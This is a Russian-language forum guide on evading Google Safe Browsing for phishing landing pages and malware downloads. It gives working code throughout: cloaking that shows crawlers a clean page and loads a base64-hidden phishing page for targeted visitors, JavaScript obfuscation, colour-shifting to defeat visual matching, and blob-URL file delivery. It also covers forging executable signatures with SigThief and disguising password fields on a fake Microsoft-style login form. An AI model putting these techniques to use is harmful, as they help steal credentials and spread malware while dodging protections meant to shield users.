Обходим блокировку нашего лендинга

[54fifty 0]

Введение. Что такое Google Safe Browsing?

Прежде чем начать работать и обходить КТ нам нужно вообще разобраться, что это такое и как это работает.

Google Safe Browsing - так называемая защита браузера chrome от фишинговых страниц и прочих видов черной деятельности. Эта штука способна выявлять фишинг при помощи хэшей (хэш это база данных, в которых хранится вся информация о вашем сайте. К примеру, о том, что изменялось на нем, какие новые данные входили). Так же он умеет детектить скачивания на вашем сайте за определенный промежуток времени. Например, вы залили видео на какую-то площадку, пошел трафик на сайт, которого раньше не было, Google замечает это и блокирует ваш домен. Если еще более кратко - это очень капризная дама, с которой будет довольно трудно договориться, к тому же она очень навязчивая.

 

Покупаем правильный домен

Есть несколько правил грамотного выбора доменов:

1. После покупки ЛЮБОГО домена нам потребуется дать ему отлежаться 1-2 недели. Да, отлежка теперь требуется и на домены, не удивляйтесь, таковы реалии. 

Зачем нужна отлежка? Крайнее время Google начал скептически относиться к доменам, которые были куплены недавно и сразу же проявляют какую-либо активность. 

2. Теперь ни в какую нельзя использовать брендовые слова. К примеру: twitter.nescam.com steamkrutoi.c0m - это является брендовым названием домена, если вы уже купили такой домен, то поздравляю, выкидывайте его. Нельзя также покупать домены, в которых изменены буквы в имени домена. Стим трафферы, ребятки которые не по понаслышке знают что такое КТ теперь понимают из-за чего оно появляется.

Также нам нужно выбрать хороший магазин для покупки домена. Рекомендую покупать на nic.ru.

 

Получаем хороший SSL сертификат

Сперва нам нужно привязать наш сайт к cloudflare, ведь когда мы ставим ssl сертификат от какого либо магазина попадает под прицел антивирусников, которые будут детектить черные сайты. По-правильному это называется фидом. По этой причине использовать обычные сертификаты - никак нельзя.

Но не смотря на это все - cloudflare нам дает бесплатный доступ к своему ssl сертификату, к тому же он не отслеживается антивирусниками, это то, что нам нужно! Приступим к получению SSL сертификата!

Получаем SSL сертификат от Cloudflare

1. Регистрируемcz на cloudflare.com. Используем обычную почту, к которой будет постоянный доступ.

2. На главной странице нажимаем кнопку "Add site".

 

3. Пишем домен нашего сайта в нужное поле.

 

4. Дальше cloudflare начнет проверять наш домен. На данный момент у вас на сайте не должно быть ничего, что могло бы вызвать подозрения, а то знаю я вас. После окончания кликаем: "Continue Setup".

 

5. Дальше просто кликаем "Continue", скипаем этот этап.

 

6. Выбираем тарифный план. Конечно же бесплатный.

 

7. Далее нам будут представлены DNS сервера, на которые надо будет перепривязать наш домен в личном кабинете сайта, где мы покупали домен. 

 

 

 

 

 

 

 

 

8. Смена DNS длится около 5-15 минут, ждем и проверяем почту. Когда все будет готово - нам напишут примерно такое сообщение на почту:

 

9. Наконец-то устанавливаем SSL сертификат. Переходим во вкладку "Crypto" и выбираем тип SSL-сертификата “Flexible”.

 

10. Перезагружаем нашу страницу с доменом и проверяем наличие SSL сертификата. Если SSL сертификат есть, то появится вот такой замочек:

 

Также у нас будет вот такая надпись на сайте cloudflare:

 

11. Вы думали это все? Неа, нам нужно настроить переадресацию, чтобы на всех субдоменах висел сертификат. Заходим во вкладку "Page Rules" и кликаем “Create Page Rule”.

 

12. Дальше домен, на котором будет стоять переадресация.

Что такое переадресация? Объясняю на пальцах: хуйня.ру - главная страница нашего форума, хуйня.ру/правила - переадресация на раздел с правилами форума.

Нам обязательно нужно делать переадресацию, чтобы избежать блокировки и какой либо связи с главным доменом. То есть шанс на блокировку будет минимальным. Всю черноту мы будем ставить на переадресацию, а не на главный домен, надеюсь, объяснил доступно.

В первой строке пишем: http://Адрес. Далее выбираем пункт “Always Use HTTPS" и жмякаем: “Save and Deploy”

 

13. Это еще не все. Продолжаем настраивать переадресацию.

В первой строке пишем www.АДРЕС/, выбираем пункт “Forwarding URL”, рядом ставите пункт “301 — Permanent Redirect”. Во второе поле пишем https://АДРЕС/$1

 

14. Вновь переходим на домен, но на этот раз на созданную переадресацию и проверяем наличие SSL сертификата.

Вот и все ребятки, хорошенький SSL сертификат настроен!

 

Прячем наш лендинг от Google Safe Browsing

Есть еще такая штука, которая называется "Краулер", она также собирает информацию о нашем сайте и передает ее модераторам Google. Опять же, чтобы избежать блокировки - нам нужно умело спрятать все грязное, что есть на нашем домене.

Его второе имя - "Поисковый бот". Если кому то интересно - можете почитать википедию для большей информации. В общем, нам обязательно нужно спрятаться от нее.

Он умеет использовать прокси, поэтому пытаться блокировать его по ip - нет смысла. Но у Google есть уязвимость - при переходе в headless режим выключается Notification api. Это мы и будем использовать.

Создаем вайт - белый сайт, который будет виден модерации.

Дальше статья без навыков кодинга будет очень трудной, тем не менее метод абсолютно рабочий и при должном усилии у вас получится разобраться. Объяснять каждый термин будет очень долго. Информация была платной, поэтому проявите должное упорство.

Допустим, наша стартовая страница фишинга называется index.php. Давайте переименуем ее в home.php и поместим код пустой (белой) целевой страницы, которую мы можем приобрести на том же школофоруме Lolzteam в тело страницы index.php.

Теперь код стартовой страницы index.php выглядит следующим образом:

 

Чтобы юзеры видели не вайт сайт, а нашу фишинговую страницу, добавим в заголовок стартовой страницы index.php следующий html-код:

 

<script>

home = 'L2hvbWUucGhw';

zones = /Madrid|Canary|Vienna|Istanbul/gi;

timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone);

self.Notification&&timezoneOffset&&fetch(atob(home)).then(

function(r){return r.text().then(function(t){document.write(t)})}

);

</script>

В этом коде мы делаем следующее: В переменной home скрываем адрес фишинговой страницы (home.php) и кодируем его в base64 (например, на сайте base64encode.net).

Это нужно, т.к. Google достает все ссылки из файлов и пытается их загрузить и сканировать.

Также отфильтровываем юзеров по часовому поясу используемого системой. Это не критически важно, но это защитит наш фиш сайт от лишних глаз. Часовые пояса мы можем глянуть здесь.

Если мы хотим залить трафик на лендинг (например, из Германии), то заменяем строку Zone=/Madrid|Canary|Vienna|Istanbul/gi; переходим на строку Zone=/Berlin/gi;

Последний шаг — проверить поддержку API уведомлений, и если юзер выберет часовой пояс, который нам подходит, мы загрузим содержимое файла home.php и заменяем его содержимым страницы index.php.

Теперь наш код должен выглядеть так:

 

Если мы все сделали правильно, то люди будут видеть наш черный ленд. Заходим по нашей переадресованной ссылке, проверяем.

 

Криптуем js файла нашего ленда

Это очень важно, если вы используете ленд, на котором ранее было получено КТ Но также это будет полезно, если вы используете чистый, новый ленд. Очень важно, чтобы наш ленд был на js, никак иначе.

Заходим на обфускатор и перекриптовываем наш ленд. Сам сайт чтобы закриптовать ленд можно найти здесь.

 

Меняем палитру нашего лендинга

Вы думаете это все? Неа, гугл еще детектит фиш сайты по кол-ву пикселей, совпадения с предыдущими лендами.

Да-да, настолько мы живем в трудном мире. Но не беда, это тоже можно решить!

Изменить сразу всю палитру мы можем используя всего 1 строчку кода.

В home.php в <head> пишем код ниже:

Код:

document.documentElement.style.cssText="filter:hue-rotate(4deg)";

Добавить его можно куда угодно, главное - в head.

 

Меняем заголовок нашей страницы

Нет, это еще не все. Многие антивирусники детектят фиш сайты по Title (заголовку страницы).

Меняем текст в title нашего ленда на любой другой, можно изменить

 

 

Обходим блокировки из-за скачиваний и вводов пароля

Сперва разберем, что делать когда льешь файлики и когда льешь фиш. К каждому нужен свой подход. Если вы льете файлики - вам нужно знать, что все данные опять же хэшируются Гуглом и блокировка может прилететь в любой момент.
Также нужно помнить, чтобы в имени файла не было: брендовых слов; нельзя использовать код .click(); нужно дать пользователю побыть на вашем домене после скачивания подольше, иначе Гугл будет блокировать скачивание; если файлик исполняемый (тот который сразу запускается).

Теперь на наш файлик нужно прикрепить цифровую подпись. Использовать будем утилитку SigThief.

Чтобы запретить скачивание нашего файлика краулером Google, нам необходимо: не использовать статичных адресов файла; избавится от кода страницы адрес файла в чистом виде; давать файл пользователю через эфимерный blob-url.

К примеру наша кнопка скачки выглядит так:

 

Убираем прямой адрес при помощи закодирования в base64 (ссылку давал выше). Нормальный вид такой:

 

Теперь в другой наш js файлик добавляем код:
 

document.addEventListener('DOMContentLoaded',function(e) {

document.querySelectorAll('#clickbtn').forEach(function(a,url) {

url = atob(a.href.split('/').slice(-1)[0]);

fetch(url).then(function(r){return r.blob()}).then(function(blob){

a.href = URL.createObjectURL(blob);

a.download = url.split('/').slice(-1)[0];

});

});

});
 

Дальше вновь обфусцируем и результат будет примерно такой:

 

Теперь перейдем к фишу. Делаем тоже дичь-кодик и получаем результаты. Использовать слово "Password" в гугле запрещено, не удивляйтесь.

Неправильно

Правильно

Дальше тыкаем в любое место html кода и пишем это:

 

<style>

.pass::before{content:"pass\08word"

}</style>

 

Тем самым мы замаскировали слово "Password". Продолжаем. Избавляемся от поля ввода пароля. Заменяем на кодик: 

<input type="text">.

<div class="wrapper">

 <input type="text" id="dots" class="form-control input ext-input text-box ext-text-box">

 <input type="text" name="passwd" id="i0118" class="form-control input ext-input text-box ext-text-box">

</div>

 

Теперь добавляем стили:

.wrapper {position:relative;}

.wrapper input[type=text] {position:absolute!important}

.wrapper #i0118 {opacity:0!important}

Выглядит все примерно так

 

Теперь оживляем поле ввода.

 

document.addEventListener('DOMContentLoaded', function(e) {

i0118.onfocus = function(e){dots.value=dots.value||'|'}

i0118.onkeyup = function(e){dots.value=i0118.value.replace(/./g,'●')+'|'}

});
 

Готово, теперь кт - вам не видать! 

 

Заключение

Ну вот статья подошла к концу. Да, все это на самом деле очень сложно и тонко, но когда я читал это все, то сам сумел разобраться. Не стоит боятся - действуйте! Писав эту статью я выпил 3 чашки чая.